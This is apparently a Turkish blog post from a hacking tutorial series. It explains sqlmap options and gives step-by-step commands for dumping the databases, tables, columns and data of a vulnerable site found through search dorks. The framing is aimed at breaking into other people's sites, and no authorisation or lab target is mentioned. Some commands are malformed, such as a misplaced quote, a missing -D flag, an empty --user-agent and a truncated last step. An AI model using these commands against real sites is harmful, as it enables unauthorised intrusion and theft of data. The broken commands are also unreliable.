#4.1 l SQLMAP Parametreleri ve Kullanımları


Merhaba arkadaşlar 

bugünkü konumuz,dorkumuzu yazdık,açıklı site bulduk, sqlmap ile veritabanına sızmaya çalıştık ama veritabanını çekemedik işte burada sqlmap parametreleri devreye giriyor.
iyi okumalar :) 

video burada açıklaması aşağıda ;



--------------------------------------

// PARAMETRE TANIMLARI // 

--risk : 1 ile 3 arasında değerler alabilen parametremiz. Eğer belirtilmezse default olarak 1 değerini alır. Risk 1 daha sınırlı sql cümleleri ile denetleme yapar. Risk 2'de risk 1'in üzerine heavy-query time based saldırılar da denetlemeye tabii tutulur. Risk 3'te ise ekstradan Or-based testler de eklenir.

--level : 1 ile 5 arasında değerler alabilen parametremiz. 1. seviyede daha kısıtlı testler denetlenirken, 5.seviyede daha fazla payload, daha detaylı prefix ve suffixler ile zenginleştirilmiş payloadlar kullanılmaktadır. Ayrıca HTTP Cookie başlığı 2.seviyeden sonra ve HTTP User-Agent/Referer başlıkları da seviye 3'ten sonra denetlenmektedir

--random-agent : Testlerimizde kullanacağımı User-Agent değerinin, sqlmap ile hazır gelen user-agent değerlerinin bulunduğu dosya içeriisnden random olarak atanması için kullanabileceğimiz parametremiz. 

--user-agent : Testlerimizde kullanacağımız User-Agent değerini kendimiz belirlemek için kullanabileceğimiz komutumuz.

-v : Default olarak 1 tanımlı gelen ve sqlmap çalıştığı süre zarfında bize gösterdiği çıktıların gösterimini belirlediğimiz verbose komutumuz. 0 ile 6 arasında değişmekte. 0 en az çıktıyı döndürürken, 6 en çok çıktı ile sonuçları döndürmekte.

--batch : Sqlmap'in input gerektiren bazı durumlarında, kullanıcı inputunu istemeden, sqlmap tarafından tanımlı default değerlere göre devam etmesini sağlayan parametremiz

--threads : Multi-threading ile sqlmap'in maximum kaç tane HTTP(s) isteği yapabileceğini belirlemek için kullanabileceğimiz parametremiz. Özellikle bruteforce searching işlemlerinde, aramamızı oldukça hızlandıran bu yöntem, performans sebepleri gerekçesiyle max. 10 thread kullanılması tavsiye edilmekte.


##################################

// VERİTABANINI DAHA KOLAY ÇEKMEK İÇİN // 

1-)C:// Dizinine Gidelim...

Kod:
cd..
cd..
2-)C:// Dizininde SQLMAP'i Çalıştıralım...
Kod:
cd sqlmap
3-)Veritabanını Çekelim...
Kod:
sqlmap.py -u "siteadresi.com/news.php?id=x*" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs
4-)Tabloları Çekelim...
Kod:
sqlmap.py -u "siteadresi.com/news.php?id=x*" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 veritabanıadı --tables
5-)Kolonları Çekelim...
Kod:
sqlmap.py -u "siteadresi.com/news.php?id=x"* --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 -D veritabanıadı -T tabloadı --columns
6-)Verileri Çekelim...
Kod:
sqlmap.py -u "siteadresi.com/news.php?id=x*" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --thread

Yorumlar

Bu blogdaki popüler yayınlar

#2 l Sitenin SQL Açıklı Olup Olmadığını Nasıl Anlarız ?

#4 l SQLMAP Kurulumu ve Kullanımı